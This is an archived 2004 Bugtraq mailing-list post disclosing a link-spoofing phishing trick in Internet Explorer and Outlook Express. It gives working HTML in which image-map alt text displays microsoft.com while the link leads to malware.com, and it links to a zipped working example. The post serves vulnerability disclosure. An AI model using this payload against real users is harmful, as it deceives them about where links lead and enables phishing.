[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

DEEP SEA PHISHING: Internet Explorer / Outlook Express

To: <bugtraq@xxxxxxxxxxxxxxxxx>
Subject: DEEP SEA PHISHING: Internet Explorer / Outlook Express
From: "http-equiv@xxxxxxxxxx" <1@xxxxxxxxxxx>
Date: Mon, 10 May 2004 20:01:54 -0000


Saturday, May 08, 2004

More silliness :

<A HREF=http://www.microsoft.com alt="http://www.microsoft.com";>
<IMG SRC="malware.gif" USEMAP="#malware" border=0
alt="http://www.microsoft.com";></A>
<map NAME="malware" alt="http://www.microsoft.com";>>
<area SHAPE=RECT COORDS="224,21" HREF="http://www.malware.com";
alt="http://www.microsoft.com";>
</MAP>

Notes:

Outlook 2003 has a bubble that correctly identifies it even with 
the alternative text

Working Example:

http://www.malware.com/pheeesh.zip


End Call

-- 
http://www.malware.com

Prev by Date: RE: a litle bypass with IE
Next by Date: Somebody exploiting (badly designed) yahoo service?
Previous by thread: Re: msxml3.dll Parsing Error Crashes Internet Explorer Remotely Upon Refresh
Next by thread: Somebody exploiting (badly designed) yahoo service?
Index(es):
- Date
- Thread